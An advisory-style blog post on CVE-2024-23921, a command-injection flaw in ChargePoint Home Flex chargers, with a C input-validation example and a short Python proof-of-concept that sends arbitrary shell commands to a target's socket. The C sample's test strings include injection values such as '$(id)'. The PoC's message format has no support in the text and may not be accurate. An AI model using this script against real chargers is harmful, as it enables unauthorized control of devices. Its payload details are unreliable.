As electric vehicle adoption continues to grow, it is crucial to ensure the security of the charging infrastructure that supports it. A security flaw has been identified in ChargePoint Home Flex charging stations that could allow malicious attackers to gain unauthorized access to and control of the device.

The vulnerability, designated CVE-2024-23921, poses a significant risk because it allows network-adjacent attackers to execute arbitrary code on affected installations without authentication. The consequences range from simple denial of service to more severe outcomes, including alteration of or access to sensitive data and unauthorized control of the charging station.

The vulnerability details indicate that the flaw lies within the wlanapp module. The root cause is a lack of proper validation of a user-supplied string before it is used to execute a system call. By leveraging this vulnerability, an attacker can execute code in the context of root, the highest-privileged user account on the system.
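The missing control described above, shown as an added example that is not ChargePoint's code or taken from the wlanapp module: a user-supplied value is checked against an allow-list and then passed as a single argument to a fixed program without starting a shell. The function names `is_safe_token` and `run_with_arg`, the permitted character set and the 32-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check: 1..max_len bytes, all from [A-Za-z0-9._-], no leading '-'.
 * Shell metacharacters (; | & $ ` space newline ...) are therefore rejected. */
int is_safe_token(const char *s, size_t max_len)
{
    static const char ok[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                             "abcdefghijklmnopqrstuvwxyz0123456789._-";
    size_t n;
    if (s == NULL || s[0] == '-')   /* a leading '-' would parse as an option */
        return 0;
    n = strlen(s);
    if (n == 0 || n > max_len)
        return 0;
    return strspn(s, ok) == n;
}

/* Run a fixed program with the value as a single argv element. No shell is
 * started, so the value is never interpreted as shell syntax.
 * Returns the child's exit status, or -1 if the value is rejected or on error. */
int run_with_arg(const char *program, const char *value)
{
    int status;
    pid_t pid;
    if (!is_safe_token(value, 32))  /* 32-byte limit is an assumption */
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *const args[] = { (char *)program, (char *)value, NULL };
        execv(program, args);
        _exit(127);                 /* only reached if execv failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    const char *samples[] = { "wlan0", "home-net_5G", "wlan0; echo x", "$(id)", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %s\n", samples[i], is_safe_token(samples[i], 32) ? "accept" : "reject");
    return 0;
}
```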

The PoC code snippet below shows how simple it is to exploit this vulnerability:

```python
import sys
import socket

def exploit(ip, port, cmd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    payload = "COMMAND|" + cmd + ";"
    sock.send(payload.encode('utf-8'))
    data = sock.recv(1024)
    sock.close()
    print(data.decode('utf-8'))

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("Usage: python3 CVE-2024-23921.py [target_ip] [port] [command]")
        sys.exit(1)
    target_ip = sys.argv[1]
    port = int(sys.argv[2])
    command = sys.argv[3]
    exploit(target_ip, port, command)
```

For additional information on this security flaw, please refer to the original references:

- CVE-2024-23921
- ChargePoint Home Flex Vulnerability Advisory

As of now, no known fixes are available. ChargePoint users are advised to closely monitor all official communication channels for any updates regarding patches, mitigations, or workarounds for this vulnerability.

Additionally, users can take precautionary measures to minimize the risks associated with CVE-2024-23921:
1. Isolate the charging stations from untrusted networks, either by using a separate local network or implementing effective firewall rules.
2. Regularly update the firmware on your ChargePoint devices to ensure they are protected against any previously known vulnerabilities.
3. Educate facility and IT staff to be aware of potential security threats and best practices relating to EV charging stations.

In conclusion, maintaining security is of utmost importance in the rapidly evolving landscape of electric vehicles. It is essential that charging infrastructure, such as ChargePoint Home Flex stations, is designed and maintained with the latest security measures to protect users and their data from malicious attacks.

Timeline

Published on: 01/31/2025 01:15:09 UTC
Last modified on: 03/24/2025 17:15:16 UTC